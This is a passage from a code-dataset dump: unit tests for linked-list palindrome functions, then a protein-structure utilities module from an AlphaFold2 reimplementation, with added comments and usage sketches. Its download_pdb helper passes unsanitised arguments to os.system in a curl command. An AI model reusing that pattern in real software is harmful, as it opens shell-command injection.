        self.pll.remove(2)
        self.pll.add(1)
        self.assertTrue(self.pll.is_palindrome())


class TestPalindromeBruteForce(TestCase):

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_empty_linked_list(self):
        self.assertIsNone(is_palindrome_brute_force(None))

    def test_single_element(self):
        l_list = Node(1)
        self.assertTrue(is_palindrome_brute_force(l_list))

    def test_two_elements(self):
        l_list = Node(1)
        l_list.next = Node(2)
        self.assertFalse(is_palindrome_brute_force(l_list))
        l_list.next = Node(1)
        self.assertTrue(is_palindrome_brute_force(l_list))

    def test_odd_elements(self):
        l_list = Node(1)
        l_list.next = Node(2)
        l_list.next.next = Node(2)
        self.assertFalse(is_palindrome_brute_force(l_list))
        l_list.next.next = Node(1)
        self.assertTrue(is_palindrome_brute_force(l_list))

    def test_even_elements(self):
        l_list = Node(1)
        l_list.next = Node(2)
        l_list.next.next = Node(2)
        l_list.next.next.next = Node(3)
        self.assertFalse(is_palindrome_brute_force(l_list))
        l_list.next.next.next = Node(1)
        self.assertTrue(is_palindrome_brute_force(l_list))


class TestPalindromeReverse(TestCase):

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_empty_node(self):
        self.assertIsNone(is_palindrome_reverse(None))

    def test_single_node(self):
        self.assertTrue(is_palindrome_reverse(Node(1)))

    def test_two_nodes(self):
        l_list = Node(1)
        l_list.next = Node(2)
        self.assertFalse(is_palindrome_reverse(l_list))
        l_list.next = Node(1)
        self.assertTrue(is_palindrome_reverse(l_list))

    def test_odd_nodes(self):
        l_list = Node(1)
        l_list.next = Node(2)
        l_list.next.next = Node(3)
        self.assertFalse(is_palindrome_reverse(l_list))
        l_list.next.next = Node(1)
        self.assertTrue(is_palindrome_reverse(l_list))

    def test_even_nodes(self):
        # build 1 -> 2 -> 2 -> 3: each link must extend the chain, not overwrite l_list.next
        l_list = Node(1)
        l_list.next = Node(2)
        l_list.next.next = Node(2)
        l_list.next.next.next = Node(3)
        self.assertFalse(is_palindrome_reverse(l_list))
        l_list.next.next.next = Node(1)
        self.assertTrue(is_palindrome_reverse(l_list))
```
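For context, a minimal sketch of the reverse-and-compare approach these tests exercise (the real implementation lives in CTCI_Ch2_Ex6; a self-contained Node is defined here so the sketch runs on its own):

```python
class Node:
    def __init__(self, data, next_node=None):
        self.data = data
        self.next = next_node

def is_palindrome_reverse_sketch(head):
    """Reverse a copy of the list, then compare it node-by-node with the original."""
    if head is None:
        return None
    # build a reversed copy by prepending each value
    rev, node = None, head
    while node is not None:
        rev = Node(node.data, rev)
        node = node.next
    # compare original with reversed copy
    while head is not None:
        if head.data != rev.data:
            return False
        head, rev = head.next, rev.next
    return True

assert is_palindrome_reverse_sketch(Node(1, Node(2, Node(1)))) is True
assert is_palindrome_reverse_sketch(Node(1, Node(2, Node(3)))) is False
```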
Row stats: avg_line_length 24.919463, max_line_length 110, alphanum_fraction 0.649879, count_classes 3,414 (score_classes 0.919472); all remaining counts and scores are 0.
Record 5:

| Field | Value |
|---|---|
| hexsha | 4250d5da81ea72feff3b65a105d5b2c76567a7d7 |
| size | 49,917 bytes |
| ext / lang | py / Python |
| path | alphafold2_pytorch/utils.py |
| repo (all views) | nilbot/alphafold2 |
| head hexsha | 455124ca9135e534739b9670c010512487965547 |
| licenses | MIT |
| max_stars | 1 star (2022-01-21T04:58:18.000Z) |
| max_issues / max_forks | null / null |
```python
# utils for working with 3d-protein structures
import os
import numpy as np
import torch
from functools import wraps
from einops import rearrange, repeat

# import torch_sparse # only needed for sparse nth_deg adj calculation

# bio
from Bio import SeqIO
import itertools
import string

# sidechainnet
import sidechainnet as scn  # needed by coords2pdb below (scn.StructureBuilder)
from tqdm import tqdm       # needed by get_all_protein_ids below
from sidechainnet.utils.sequence import ProteinVocabulary, ONE_TO_THREE_LETTER_MAP
from sidechainnet.utils.measure import GLOBAL_PAD_CHAR
from sidechainnet.structure.build_info import NUM_COORDS_PER_RES, BB_BUILD_INFO, SC_BUILD_INFO
from sidechainnet.structure.StructureBuilder import _get_residue_build_iter

# build vocabulary
VOCAB = ProteinVocabulary()

# constants
import alphafold2_pytorch.constants as constants

# helpers
def exists(val):
    return val is not None

# constants: same as in alphafold2.py
DISTANCE_THRESHOLDS = torch.linspace(2, 20, steps = constants.DISTOGRAM_BUCKETS)

# distance binning function
def get_bucketed_distance_matrix(coords, mask, num_buckets = constants.DISTOGRAM_BUCKETS, ignore_index = -100):
    distances = torch.cdist(coords, coords, p=2)
    boundaries = torch.linspace(2, 20, steps = num_buckets, device = coords.device)
    discretized_distances = torch.bucketize(distances, boundaries[:-1])
    discretized_distances.masked_fill_(~(mask[..., None] & mask[..., None, :]), ignore_index)
    return discretized_distances
```
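For orientation, a small usage sketch of the bucketing function (shapes and values are illustrative):

```python
# bucket pairwise distances for a batch of 2 proteins, 16 residues each
coords = torch.randn(2, 16, 3) * 10           # (batch, L, 3) coordinates in Angstroms
mask   = torch.ones(2, 16, dtype=torch.bool)  # all residues present
buckets = get_bucketed_distance_matrix(coords, mask)
print(buckets.shape)  # torch.Size([2, 16, 16]); entries are bucket indices, -100 where masked
```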
```python
# decorators
def set_backend_kwarg(fn):
    @wraps(fn)
    def inner(*args, backend = 'auto', **kwargs):
        if backend == 'auto':
            backend = 'torch' if isinstance(args[0], torch.Tensor) else 'numpy'
        kwargs.update(backend = backend)
        return fn(*args, **kwargs)
    return inner

def expand_dims_to(t, length = 3):
    if length == 0:
        return t
    return t.reshape(*((1,) * length), *t.shape) # will work with both torch and numpy

def expand_arg_dims(dim_len = 3):
    """ pack here for reuse.
        turns input into (B x D x N)
    """
    def outer(fn):
        @wraps(fn)
        def inner(x, y, **kwargs):
            assert len(x.shape) == len(y.shape), "Shapes of A and B must match."
            remaining_len = dim_len - len(x.shape)
            x = expand_dims_to(x, length = remaining_len)
            y = expand_dims_to(y, length = remaining_len)
            return fn(x, y, **kwargs)
        return inner
    return outer

def invoke_torch_or_numpy(torch_fn, numpy_fn):
    def outer(fn):
        @wraps(fn)
        def inner(*args, **kwargs):
            backend = kwargs.pop('backend')
            passed_args = fn(*args, **kwargs)
            passed_args = list(passed_args)
            if isinstance(passed_args[-1], dict):
                passed_kwargs = passed_args.pop()
            else:
                passed_kwargs = {}
            backend_fn = torch_fn if backend == 'torch' else numpy_fn
            return backend_fn(*passed_args, **passed_kwargs)
        return inner
    return outer

# preprocess data
def get_atom_ids_dict():
    """ Gets a dict mapping each atom to a token. """
    ids = set(["", "N", "CA", "C", "O"])
    for k,v in SC_BUILD_INFO.items():
        for name in v["atom-names"]:
            ids.add(name)
    return {k: i for i,k in enumerate(sorted(ids))}

def make_cloud_mask(aa):
    """ relevant points will be 1. paddings will be 0. """
    mask = np.zeros(14)
    # early stop if padding token
    if aa == "_":
        return mask
    # get num of atoms in aa
    n_atoms = 4+len( SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"] )
    mask[:n_atoms] = 1
    return mask

def make_atom_id_embedds(aa, atom_ids):
    """ Return the tokens for each atom in the aa. """
    mask = np.zeros(14)
    # early stop if padding token
    if aa == "_":
        return mask
    # get atom id
    atom_list = ["N", "CA", "C", "O"] + SC_BUILD_INFO[ ONE_TO_THREE_LETTER_MAP[aa] ]["atom-names"]
    for i,atom in enumerate(atom_list):
        mask[i] = ATOM_IDS[atom]
    return mask

ATOM_IDS = get_atom_ids_dict()
CUSTOM_INFO = {k: {"cloud_mask": make_cloud_mask(k),
                   "atom_id_embedd": make_atom_id_embedds(k, atom_ids=ATOM_IDS),
                  } for k in "ARNDCQEGHILKMFPSTWYV_"}

# common utils

# parsing to pdb for easier visualization - other example from sidechainnet is:
# https://github.com/jonathanking/sidechainnet/tree/master/sidechainnet/structure

def download_pdb(name, route):
    """ Downloads a PDB entry from the RCSB PDB.
        Inputs:
        * name: str. the PDB entry id. 4 characters, capitalized.
        * route: str. path of the destination file, usually with a ".pdb" extension
        Output: path of the destination file
    """
    os.system(f"curl https://files.rcsb.org/download/{name}.pdb > {route}")
    return route

def clean_pdb(name, route=None, chain_num=None):
    """ Cleans the structure to only leave the important part.
        Inputs:
        * name: str. path of the input .pdb file
        * route: str. path of the output. will overwrite the input if not provided
        * chain_num: int. index of the chain to select (1-indexed, as in pdb files)
        Output: path of the destination file.
    """
    import mdtraj
    destin = route if route is not None else name
    # read input
    raw_prot = mdtraj.load_pdb(name)
    # iterate over prot and select the specified chains
    idxs = []
    for chain in raw_prot.topology.chains:
        # if arg passed, only select that chain
        if chain_num is not None:
            if chain_num != chain.index:
                continue
        # select indexes of chain
        chain_idxs = raw_prot.topology.select(f"chainid == {str(chain.index)}")
        idxs.extend( chain_idxs.tolist() )
    # sort: topology and xyz selection are ordered
    idxs = sorted(idxs)
    # get new trajectory from the selected subset of indexes and save
    prot = mdtraj.Trajectory(xyz=raw_prot.xyz[:, idxs],
                             topology=raw_prot.topology.subset(idxs))
    prot.save(destin)
    return destin

def custom2pdb(coords, proteinnet_id, route):
    """ Takes a custom representation and turns it into a .pdb file.
        Inputs:
        * coords: array/tensor of shape (3 x N) or (N x 3). in Angstroms.
                  same order as in the proteinnet is assumed (same as raw pdb file)
        * proteinnet_id: str. proteinnet id format (<class>#<pdb_id>_<chain_number>_<chain_id>)
                         see: https://github.com/aqlaboratory/proteinnet/
        * route: str. destination path.
        Output: tuple of paths: (original, generated) for the structures.
    """
    import mdtraj
    # convert to numpy
    if isinstance(coords, torch.Tensor):
        coords = coords.detach().cpu().numpy()
    # ensure (1, N, 3)
    if coords.shape[0] == 3:
        coords = coords.T                        # (3, N) -> (N, 3)
    coords = np.expand_dims(coords, axis=0)      # np.newaxis is not callable; this adds the frame axis
    # get pdb id and chain num
    pdb_name, chain_num = proteinnet_id.split("#")[-1].split("_")[:-1]
    pdb_destin = "/".join(route.split("/")[:-1])+"/"+pdb_name+".pdb"
    # download pdb file and select the appropriate chain
    download_pdb(pdb_name, pdb_destin)
    clean_pdb(pdb_destin, chain_num=chain_num)
    # load trajectory scaffold and replace coordinates - assumes same order
    scaffold = mdtraj.load_pdb(pdb_destin)
    scaffold.xyz = coords
    scaffold.save(route)
    return pdb_destin, route

def coords2pdb(seq, coords, cloud_mask, prefix="", name="af2_struct.pdb"):
    """ Turns coordinates into PDB files ready to be visualized.
        Inputs:
        * seq: (L,) tensor of ints (sidechainnet aa-key pairs)
        * coords: (3, N) coords of atoms
        * cloud_mask: (L, C) boolean mask of occupied spaces in scn format
        * prefix: str. directory to save files.
        * name: str. name of the destination file (ex: pred1.pdb)
    """
    scaffold = torch.zeros(*cloud_mask.shape, 3)  # torch.zeros takes sizes, not a shape tuple plus an int
    scaffold[cloud_mask] = coords.cpu().float()
    # build structures and save
    pred = scn.StructureBuilder( seq, crd=scaffold )
    pred.to_pdb(prefix+name)

# adapted from https://github.com/facebookresearch/esm

def remove_insertions(sequence: str) -> str:
    """ Removes any insertions from the sequence. Needed to load aligned sequences in an MSA. """
    deletekeys = dict.fromkeys(string.ascii_lowercase)
    deletekeys["."] = None
    deletekeys["*"] = None
    translation = str.maketrans(deletekeys)
    return sequence.translate(translation)

def read_msa(filename: str, nseq: int):
    """ Reads the first nseq sequences from an MSA file, automatically removing insertions."""
    return [(record.description, remove_insertions(str(record.seq)))
            for record in itertools.islice(SeqIO.parse(filename, "fasta"), nseq)]
```
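A quick check of the insertion-stripping convention (lowercase residues, "." and "*" mark insertions in a3m-style alignments; uppercase residues and gaps are kept):

```python
# lowercase letters, "." and "*" are stripped; "M", "-", "K", "L" survive
assert remove_insertions("M-Kv.aL*") == "M-KL"
```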
```python
# sidechainnet / MSA / other data utils

def ids_to_embed_input(x):
    """ Returns the amino acid string input for calculating the ESM and MSA transformer embeddings
        Inputs:
        * x: any deeply nested list of integers that correspond with amino acid id
    """
    assert isinstance(x, list), 'input must be a list'
    id2aa = VOCAB._int2char
    out = []
    for el in x:
        if isinstance(el, list):
            out.append(ids_to_embed_input(el))
        elif isinstance(el, int):
            out.append(id2aa[el])
        else:
            raise TypeError('type must be either list or character')
    if all(map(lambda c: isinstance(c, str), out)):
        return (None, ''.join(out))
    return out

def get_msa_embedd(msa, embedd_model, batch_converter, device = None):
    """ Returns the MSA_tr embeddings for a protein.
        Inputs:
        * msa: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
        * embedd_model: MSA_tr model (see train_end2end.py for an example)
        * batch_converter: MSA_tr batch converter (see train_end2end.py for an example)
        Outputs: tensor of (batch, n_seqs, L, embedd_dim)
        * n_seqs: number of sequences in the MSA
        * embedd_dim: number of embedding dimensions. 768 for MSA_Transformer
    """
    # use MSA transformer
    REPR_LAYER_NUM = 12
    device = embedd_model.device
    max_seq_len = msa.shape[-1]
    embedd_inputs = ids_to_embed_input(msa.cpu().tolist())
    msa_batch_labels, msa_batch_strs, msa_batch_tokens = batch_converter(embedd_inputs)
    with torch.no_grad():
        results = embedd_model(msa_batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
    # index 0 is for the start token, so take from index 1 on
    token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :]
    return token_reps

def get_esm_embedd(seq, embedd_model, batch_converter, msa_data=None):
    """ Returns the ESM embeddings for a protein.
        Inputs:
        * seq: ( (b,) L,) tensor of ints (in sidechainnet int-char convention)
        * embedd_model: ESM model (see train_end2end.py for an example)
        * batch_converter: ESM batch converter (see train_end2end.py for an example)
        Outputs: tensor of (batch, n_seqs, L, embedd_dim)
        * n_seqs: number of sequences in the MSA. 1 for ESM-1b
        * embedd_dim: number of embedding dimensions. 1280 for ESM-1b
    """
    # use ESM transformer
    device = embedd_model.device
    REPR_LAYER_NUM = 33
    max_seq_len = seq.shape[-1]
    embedd_inputs = ids_to_embed_input(seq.cpu().tolist())
    batch_labels, batch_strs, batch_tokens = batch_converter(embedd_inputs)
    with torch.no_grad():
        results = embedd_model(batch_tokens.to(device), repr_layers=[REPR_LAYER_NUM], return_contacts=False)
    # index 0 is for the start token, so take from index 1 on
    token_reps = results["representations"][REPR_LAYER_NUM][..., 1:, :].unsqueeze(dim=1)
    return token_reps

def get_all_protein_ids(dataloader, verbose=False):
    """ Given a sidechainnet dataloader for a CASP version,
        returns all the ids belonging to proteins.
        Inputs:
        * dataloader: a sidechainnet dataloader for a CASP version
        Outputs: a set containing the ids for all protein entries.
    """
    # store ids here
    ids = set([])
    # iterate over all batches (use the dataloader passed as argument)
    for i,batch in tqdm(enumerate(dataloader)):
        # for breaking from 2 loops at once
        try:
            for i in range(batch.int_seqs.shape[0]):
                # check if all fragments are : 4_LETTER_PDB + NUM + CHAIN
                max_len_10 = len(batch.pids[i]) < 10
                fragments = [len(x) <= 4 for x in batch.pids[i].split("_")]
                fragments_under_4 = sum(fragments) == len(fragments) # AND CONDITION
                # record id
                if max_len_10 and fragments_under_4:
                    ids.add(batch.pids[i])
                else:
                    if verbose:
                        print("skip:", batch.pids[i], "under 4", fragments)
        except StopIteration:
            break
    # returns set of ids
    return ids

def scn_cloud_mask(scn_seq, boolean=True, coords=None):
    """ Gets the boolean mask of atom positions (not all aas have the same atoms).
        Inputs:
        * scn_seq: (batch, length) sequence as provided by the sidechainnet package
        * boolean: whether to return as an array of idxs or boolean values
        * coords: optional. (batch, lc, 3) sidechainnet coords.
                  returns the true mask (solves potential atoms that might not be provided)
        Outputs: (batch, length, NUM_COORDS_PER_RES) boolean mask
    """
    scn_seq = expand_dims_to(scn_seq, 2 - len(scn_seq.shape))
    # early check for coords mask
    if coords is not None:
        batch_mask = ( rearrange(coords, '... (l c) d -> ... l c d', c=14) == 0 ).sum(dim=-1) < coords.shape[-1]
        if boolean:
            return batch_mask.bool()
        else:
            return batch_mask.nonzero()
    # do loop in cpu
    device = scn_seq.device
    batch_mask = []
    scn_seq = scn_seq.cpu().tolist()
    for i, seq in enumerate(scn_seq):
        # get masks for each prot (points for each aa)
        batch_mask.append( torch.tensor([CUSTOM_INFO[VOCAB.int2char(aa)]['cloud_mask'] \
                                         for aa in seq]).bool().to(device).unsqueeze(0) )
    # concat in last dim
    batch_mask = torch.cat(batch_mask, dim=0)
    # return mask (boolean or indexes)
    if boolean:
        return batch_mask.bool()
    else:
        return batch_mask.nonzero()

def scn_backbone_mask(scn_seq, boolean=True, n_aa=3):
    """ Gets the boolean mask for N and CA positions.
        Inputs:
        * scn_seq: sequence(s) as provided by the sidechainnet package (int tensor/s)
        * boolean: whether to return as an array of idxs or boolean values
        * n_aa: number of atoms in a backbone (may include cbeta as 4th pos)
        Outputs: (N_mask, CA_mask, C_mask)
    """
    wrapper = torch.zeros(*scn_seq.shape, n_aa).to(scn_seq.device)
    # N is the first atom in every AA. CA is the 2nd.
    wrapper[..., 0] = 1
    wrapper[..., 1] = 2
    wrapper[..., 2] = 3
    wrapper = rearrange(wrapper, '... l c -> ... (l c)')
    # find idxs
    N_mask = wrapper == 1
    CA_mask = wrapper == 2
    C_mask = wrapper == 3
    if boolean:
        return N_mask, CA_mask, C_mask
    return torch.nonzero(N_mask), torch.nonzero(CA_mask), torch.nonzero(C_mask)

def scn_atom_embedd(scn_seq):
    """ Returns the token for each atom in the aa.
        Inputs:
        * scn_seq: sequence(s) as provided by the sidechainnet package (int tensor/s)
    """
    device = scn_seq.device
    batch_tokens = []
    # do loop in cpu
    scn_seq = scn_seq.cpu()
    for i,seq in enumerate(scn_seq):
        batch_tokens.append( torch.tensor([CUSTOM_INFO[VOCAB.int2char(aa.item())]["atom_id_embedd"] \
                                           for aa in seq]).long().to(device).unsqueeze(0) )
    batch_tokens = torch.cat(batch_tokens, dim=0)
    return batch_tokens

def nth_deg_adjacency(adj_mat, n=1, sparse=False):
    """ Calculates the n-th degree adjacency matrix.
        Performs mm of adj_mat and adds the newly reached nodes.
        Default is dense. Mods for the sparse version are done when needed.
        Inputs:
        * adj_mat: (N, N) adjacency tensor
        * n: int. degree of the output adjacency
        * sparse: bool. whether to use the torch-sparse module
        Outputs:
        * edge_idxs: ij positions of the adjacency matrix
        * edge_attrs: degree of connectivity (1 for neighs, 2 for neighs^2, ... )
    """
    adj_mat = adj_mat.float()
    attr_mat = torch.zeros_like(adj_mat)
    new_adj_mat = adj_mat.clone()

    for i in range(n):
        if i == 0:
            attr_mat += adj_mat
            continue

        if i == 1 and sparse:
            idxs = adj_mat.nonzero().t()
            vals = adj_mat[idxs[0], idxs[1]]
            new_idxs = idxs.clone()
            new_vals = vals.clone()

        m, k, n = 3 * [adj_mat.shape[0]] # (m, n) * (n, k), but adj_mats are squared: m=n=k
        # note: this rebinds n (the degree) to the matrix size; range(n) above was already evaluated
        if sparse:
            new_idxs, new_vals = torch_sparse.spspmm(new_idxs, new_vals, idxs, vals, m=m, k=k, n=n)
            new_vals = new_vals.bool().float()
            new_adj_mat = torch.zeros_like(attr_mat)
            new_adj_mat[new_idxs[0], new_idxs[1]] = new_vals
            # sparse to dense is slower
            # torch.sparse.FloatTensor(idxs, vals).to_dense()
        else:
            new_adj_mat = (new_adj_mat @ adj_mat).bool().float()

        # in-place fill; masked_fill (without the underscore) would discard the result
        attr_mat.masked_fill_( (new_adj_mat - attr_mat.bool().float()).bool(), i+1 )

    return new_adj_mat, attr_mat
```
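A minimal smoke test of the dense path (no torch-sparse needed); attr_mat encodes the connectivity degree of each reachable pair:

```python
# 4-node path graph 0-1-2-3; request 2nd-degree adjacency
adj = torch.tensor([[0., 1., 0., 0.],
                    [1., 0., 1., 0.],
                    [0., 1., 0., 1.],
                    [0., 0., 1., 0.]])
new_adj, attrs = nth_deg_adjacency(adj, n=2, sparse=False)
print(new_adj.shape, attrs.shape)  # both torch.Size([4, 4])
```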
```python
def prot_covalent_bond(seqs, adj_degree=1, cloud_mask=None, mat=True):
    """ Returns the idxs of covalent bonds for a protein.
        Inputs
        * seqs: (b, n) torch long.
        * adj_degree: int. adjacency degree
        * cloud_mask: mask selecting the present atoms.
        * mat: whether to return as indexes or matrices.
               for indexes, only 1 seq is supported
        Outputs: edge_idxs, edge_attrs
    """
    device = seqs.device
    # get starting poses for every aa
    adj_mat = torch.zeros(seqs.shape[0], seqs.shape[1]*14, seqs.shape[1]*14)
    # not needed to device since it's only for indices
    scaff = torch.zeros(seqs.shape[1], 14)
    scaff[:, 0] = 1
    idxs = torch.nonzero(scaff).reshape(-1)
    for s,seq in enumerate(seqs):
        for i,idx in enumerate(idxs):
            if i >= seq.shape[0]:
                break
            # offset by pos in chain ( intra-aa bonds + with next aa )
            bonds = idx + torch.tensor( constants.AA_DATA[VOCAB.int2char(seq[i].item())]['bonds'] + [[2, 14]] ).t()
            # delete link with next if final AA in seq
            if i == idxs.shape[0]-1:
                bonds = bonds[:, :-1]
            # modify adj mat
            adj_mat[s, bonds[0], bonds[1]] = 1
        # convert to undirected
        adj_mat[s] = adj_mat[s] + adj_mat[s].t()
    # do N_th degree adjacency
    adj_mat, attr_mat = nth_deg_adjacency(adj_mat, n=adj_degree, sparse=False) # True
    if mat:
        return attr_mat.bool().to(seqs.device), attr_mat.to(device)
    else:
        edge_idxs = attr_mat[0].nonzero().t().long()
        edge_attrs = attr_mat[0, edge_idxs[0], edge_idxs[1]]
        return edge_idxs.to(seqs.device), edge_attrs.to(seqs.device)

def nerf_torch(a, b, c, l, theta, chi):
    """ Custom Natural extension of Reference Frame.
        Inputs:
        * a: (batch, 3) or (3,). point(s) of the plane, not connected to d
        * b: (batch, 3) or (3,). point(s) of the plane, not connected to d
        * c: (batch, 3) or (3,). point(s) of the plane, connected to d
        * l: (batch,) or float. bond length(s) between c and d
        * theta: (batch,) or (float). angle(s) between b-c-d
        * chi: (batch,) or float. dihedral angle(s) between the a-b-c and b-c-d planes
        Outputs: d (batch, 3) or (3,). the next point in the sequence, linked to c
    """
    # safety check
    if not ( (-np.pi <= theta) * (theta <= np.pi) ).all().item():
        raise ValueError(f"theta(s) must be in radians and in [-pi, pi]. theta(s) = {theta}")
    # calc vecs
    ba = b-a
    cb = c-b
    # calc rotation matrix. based on plane normals and normalized
    n_plane = torch.cross(ba, cb, dim=-1)
    n_plane_ = torch.cross(n_plane, cb, dim=-1)
    rotate = torch.stack([cb, n_plane_, n_plane], dim=-1)
    rotate /= torch.norm(rotate, dim=-2, keepdim=True)
    # calc proto point, rotate
    d = torch.stack([-torch.cos(theta),
                     torch.sin(theta) * torch.cos(chi),
                     torch.sin(theta) * torch.sin(chi)], dim=-1).unsqueeze(-1)
    # extend base point, set length
    return c + l.unsqueeze(-1) * torch.matmul(rotate, d).squeeze()
```
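A small usage sketch placing a fourth atom from three reference points (the bond length, bond angle theta, and dihedral chi below are illustrative values, not real chemistry):

```python
a = torch.tensor([0.0, 0.0, 0.0])
b = torch.tensor([1.5, 0.0, 0.0])
c = torch.tensor([2.0, 1.4, 0.0])
l     = torch.tensor(1.33)          # bond length c-d
theta = torch.tensor(np.pi * 2/3)   # angle b-c-d, in radians (must be within [-pi, pi])
chi   = torch.tensor(np.pi)         # dihedral between planes a-b-c and b-c-d
d = nerf_torch(a, b, c, l, theta, chi)
print(d)  # (3,) coordinates of the new point, linked to c
```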
```python
def sidechain_container(backbones, n_aa, cloud_mask=None, place_oxygen=False,
                        n_atoms=NUM_COORDS_PER_RES, padding=GLOBAL_PAD_CHAR):
    """ Gets a backbone of the protein, returns the whole coordinates
        with sidechains (same format as sidechainnet). Keeps differentiability.
        Inputs:
        * backbones: (batch, L*3, 3): assumes batch=1 (could be extended later).
                     Coords for (N-term, C-alpha, C-term) of every aa.
        * n_aa: int. number of points for each aa in the backbones.
        * cloud_mask: (batch, l, c). optional. cloud mask from scn_cloud_mask.
                      sets points outside of it to 0 if passed, else c_alpha.
        * place_oxygen: whether to calculate the oxygen of the
                        carbonyl group via NeRF
        * n_atoms: int. n of atom positions / atom. same as in sidechainnet: 14
        * padding: int. padding token. same as in sidechainnet: 0
        Outputs: whole coordinates of shape (batch, L, n_atoms, 3)
    """
    device = backbones.device
    batch, length = backbones.shape[0], backbones.shape[1] // n_aa
    # build scaffold from (N, CA, C, CB)
    new_coords = torch.zeros(batch, length, NUM_COORDS_PER_RES, 3).to(device)
    predicted = rearrange(backbones, 'b (l back) d -> b l back d', l=length)
    # set backbone positions
    new_coords[:, :, :3] = predicted[:, :, :3]
    # set rest of positions to c_beta if present, else c_alpha
    if n_aa == 4:
        new_coords[:, :, 4:] = repeat(predicted[:, :, -1], 'b l d -> b l scn d', scn=10)
    else:
        new_coords[:, :, 4:] = repeat(new_coords[:, :, 1], 'b l d -> b l scn d', scn=10)
    if cloud_mask is not None:
        new_coords[torch.logical_not(cloud_mask)] = 0.
    # hard-calculate oxygen position of carbonyl group with parallel version of NeRF
    if place_oxygen:
        # build (=O) position of every aa in each chain
        for s in range(batch):
            # dihedrals phi=f(c-1, n, ca, c) & psi=f(n, ca, c, n+1)
            # phi = get_dihedral_torch(*backbone[s, i*3 - 1 : i*3 + 3]) if i>0 else None
            psis = torch.tensor([ get_dihedral_torch(*backbones[s, i*3 + 0 : i*3 + 4]) if i < length-1 else np.pi*5/4 \
                                  for i in range(length) ])
            # the angle for placing the oxygen is opposite to the psi of the current res.
            # psi is not available for the last residue, so 5*pi/4 is used for now
            bond_lens = repeat(torch.tensor(BB_BUILD_INFO["BONDLENS"]["c-o"]), ' -> b', b=length).to(psis.device)
            bond_angs = repeat(torch.tensor(BB_BUILD_INFO["BONDANGS"]["ca-c-o"]), ' -> b', b=length).to(psis.device)
            correction = repeat(torch.tensor(-np.pi), ' -> b', b=length).to(psis.device)
            new_coords[:, :, 3] = nerf_torch(new_coords[:, :, 0],
                                             new_coords[:, :, 1],
                                             new_coords[:, :, 2],
                                             bond_lens, bond_angs, psis + correction)
    else:
        # init oxygen to carbonyl
        new_coords[:, :, 3] = predicted[:, :, 2]
    return new_coords

# distance utils (distogram to dist mat + masking)

def center_distogram_torch(distogram, bins=DISTANCE_THRESHOLDS, min_t=1., center="mean", wide="std"):
    """ Returns the central estimate of a distogram (mean by default; median also supported).
        Inputs:
        * distogram: (batch, N, N, B) where B is the number of buckets.
        * bins: (B,) containing the cutoffs for the different buckets
        * min_t: float. lower bound for distances.
        Outputs:
        * central: (batch, N, N)
        * weights: (batch, N, N)
    """
    shape, device = distogram.shape, distogram.device
    # threshold to weights and find mean value of each bin
    n_bins = ( bins - 0.5 * (bins[2] - bins[1]) ).to(device)
    n_bins[0] = 1.5
    n_bins[-1] = 1.33*bins[-1] # above last threshold is ignored
    max_bin_allowed = torch.tensor(n_bins.shape[0]-1).to(device).long()
    # calculate measures of centrality and dispersion
    magnitudes = distogram.sum(dim=-1)
    if center == "median":
        cum_dist = torch.cumsum(distogram, dim=-1)
        medium = 0.5 * cum_dist[..., -1:]
        central = torch.searchsorted(cum_dist, medium).squeeze()
        central = n_bins[ torch.min(central, max_bin_allowed) ]
    elif center == "mean":
        central = (distogram * n_bins).sum(dim=-1) / magnitudes
    # create mask for last class - (IGNORE_INDEX)
    mask = (central <= bins[-2].item()).float()
    # mask diagonal to 0 dist - don't do masked filling to avoid inplace errors
    diag_idxs = np.arange(shape[-2])
    central = expand_dims_to(central, 3 - len(central.shape))
    central[:, diag_idxs, diag_idxs] *= 0.
    # provide weights
    if wide == "var":
        dispersion = (distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes
    elif wide == "std":
        dispersion = ((distogram * (n_bins - central.unsqueeze(-1))**2).sum(dim=-1) / magnitudes).sqrt()
    else:
        dispersion = torch.zeros_like(central, device=device)
    # rescale to 0-1. lower std / var --> weight=1. set potential nan's to 0
    weights = mask / (1+dispersion)
    weights[weights != weights] *= 0.
    weights[:, diag_idxs, diag_idxs] *= 0.
    return central, weights
```
# distance matrix to 3d coords: https://github.com/scikit-learn/scikit-learn/blob/42aff4e2e/sklearn/manifold/_mds.py#L279
def mds_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5, eigen=False, verbose=2):
""" Gets distance matrix. Outputs 3d. See below for wrapper.
Assumes (for now) distogram is (N x N) and symmetric
Outs:
* best_3d_coords: (batch x 3 x N)
* historic_stresses: (batch x steps)
"""
device, dtype = pre_dist_mat.device, pre_dist_mat.type()
# ensure batched MDS
pre_dist_mat = expand_dims_to(pre_dist_mat, length = ( 3 - len(pre_dist_mat.shape) ))
# start
batch, N, _ = pre_dist_mat.shape
diag_idxs = np.arange(N)
his = [torch.tensor([np.inf]*batch, device=device)]
# initialize by eigendecomposition: https://www.lptmc.jussieu.fr/user/lesne/bioinformatics.pdf
# follow : https://www.biorxiv.org/content/10.1101/2020.11.27.401232v1.full.pdf
D = pre_dist_mat**2
M = 0.5 * (D[:, :1, :] + D[:, :, :1] - D)
# do loop svd bc it's faster: (2-3x in CPU and 1-2x in GPU)
# https://discuss.pytorch.org/t/batched-svd-lowrank-being-much-slower-than-loop-implementation-both-cpu-and-gpu/119336
svds = [torch.svd_lowrank(mi) for mi in M]
u = torch.stack([svd[0] for svd in svds], dim=0)
s = torch.stack([svd[1] for svd in svds], dim=0)
v = torch.stack([svd[2] for svd in svds], dim=0)
best_3d_coords = torch.bmm(u, torch.diag_embed(s).sqrt())[..., :3]
# only eigen - way faster but not weights
if weights is None and eigen==True:
return torch.transpose( best_3d_coords, -1, -2), torch.zeros_like(torch.stack(his, dim=0))
elif eigen==True:
if verbose:
print("Can't use eigen flag if weights are active. Fallback to iterative")
# continue the iterative way
if weights is None:
weights = torch.ones_like(pre_dist_mat)
# iterative updates:
for i in range(iters):
# compute distance matrix of coords and stress
best_3d_coords = best_3d_coords.contiguous()
dist_mat = torch.cdist(best_3d_coords, best_3d_coords, p=2).clone()
stress = ( weights * (dist_mat - pre_dist_mat)**2 ).sum(dim=(-1,-2)) * 0.5
# perturb - update X using the Guttman transform - sklearn-like
dist_mat[ dist_mat <= 0 ] += 1e-7
